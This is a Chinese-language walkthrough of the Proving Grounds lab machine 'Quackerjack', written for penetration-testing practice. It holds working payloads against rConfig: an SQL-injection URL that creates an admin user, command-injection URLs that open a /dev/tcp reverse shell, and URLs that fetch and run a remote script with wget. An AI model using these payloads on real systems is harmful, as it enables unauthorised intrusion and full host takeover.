Quackerjack pg walkthrough

nmap

┌──(root㉿kali)-[~]
└─# nmap -p- -A 192.168.159.57
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 00:05 UTC
Stats: 0:02:01 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 00:07 (0:00:00 remaining)
Nmap scan report for 192.168.159.57
Host is up (0.071s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.45.250
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 a2:ec:75:8d:86:9b:a3:0b:d3:b6:2f:64:04:f9:fd:25 (RSA)
|   256 b6:d2:fd:bb:08:9a:35:02:7b:33:e3:72:5d:dc:64:82 (ECDSA)
|_  256 08:95:d6:60:52:17:3d:03:e4:7d:90:fd:b2:ed:44:86 (ED25519)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-title: Apache HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
| http-methods:
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp  open  netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open  mysql       MariaDB (unauthorized)
8081/tcp open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: 400 Bad Request
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|storage-misc
Running (JUST GUESSING): Linux 3.X|4.X|5.X (91%), Crestron 2-Series (86%), HP embedded (85%), Oracle VM Server 3.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:3.13 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:oracle:vm_server:3.4.2 cpe:/o:linux:linux_kernel:4.1
Aggressive OS guesses: Linux 3.13 (91%), Linux 3.10 - 4.11 (90%), Linux 3.2 - 4.9 (90%), Linux 5.1 (90%), Linux 3.18 (88%), Crestron XPanel control system (86%), Linux 3.16 (86%), HP P2000 G3 NAS device (85%), Oracle VM Server 3.4.2 (Linux 4.1) (85%), Linux 4.4 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: QUACKERJACK; OS: Unix

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m15s, median: 0s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-12-05T00:07:18
|_  start_date: N/A
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.10.4)
|   Computer name: quackerjack
|   NetBIOS computer name: QUACKERJACK\x00
|   Domain name: \x00
|   FQDN: quackerjack
|_  System time: 2024-12-04T19:07:19-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   70.40 ms 192.168.45.1
2   70.29 ms 192.168.45.254
3   72.42 ms 192.168.251.1
4   72.47 ms 192.168.159.57

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 162.69 seconds

访问80881端口

发现框架版本号

搜索exp

https://www.exploit-db.com/exploits/49783

试试ftp 没反应

看看smba 好像也没啥共享文件

看来突破口就是8081的cms了

我们执行exp发现 这个脚本实际上成功了一半

为什么这么说呢 因为他成功的创建了admin 的一个用户 但是rce命令却没有执行成功

我没审一下exp代码

我先把他看样子他是利用sql注入来实现注册一个admin用户的

我直接把他的payload 打印出来



然后我再把他的rce payload 打印出来



这样再次执行这个exp



他就会把创建用户的payload 和rce payload 打印

创建用户

https://192.168.159.57:8081/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20(812,%20%27whagimrnbp%27,%20%2721232f297a57a5a743894a0e4a801fc3%27,%20%276c97424dc92f14ae78f8cc13cd08308d%27,%209,%20%27whagimrnbp@domain.com%27,%201346920339,%201);--

执行创建用户之后我用这个用户登录发现登录成功

rce

https://192.168.159.57:8081/lib/ajaxHandlers/ajaxArchiveFiles.php?path=%20%60touch%20/tmp/.ravnwxuzqe.txt%3Bsudo%20zip%20-q%20/tmp/.ravnwxuzqe.zip%20/tmp/.ravnwxuzqe.txt%20-T%20-TT%20%27/bin/sh%20-i%3E%26%20/dev/tcp/192.168.45.250/80%200%3E%261%20%23%27%60%20&ext=random

试了试rcepayload 页面回显长这样 但是rce确实没仔细

然后我们仔细看看这个rce的payload发现过于复杂了，而且它里面有sudo命令也就是说如果sudo报错后面的命令是执行不成功的

我们简化一下 rce代码 再探测一下 rce能否执行

https://192.168.159.57:8081/lib/ajaxHandlers/ajaxArchiveFiles.php?path=%20curl%20192.168.45.250%2080%20&ext=random



这次发现成功了

ok 那我严重怀疑就是sudo的问题导致rce没执行成功

https://192.168.159.57:8081/lib/ajaxHandlers/ajaxArchiveFiles.php?path=wget192.168.45.250/re3.sh%20&ext=random

点击查看代码

https://192.168.159.57:8081/lib/ajaxHandlers/ajaxArchiveFiles.php?path=%20`wget192.168.45.250/re3.sh`%20&ext=random
https://192.168.159.57:8081/lib/ajaxHandlers/ajaxArchiveFiles.php?path=%20`bash%20./re3.sh`%20&ext=random

https://192.168.159.57:8081/lib/ajaxHandlers/ajaxArchiveFiles.php?path=bash%20./re3.sh%20&ext=random

反弹成功



提权

发现find有suid 权限

提权成功

两个小时结束战斗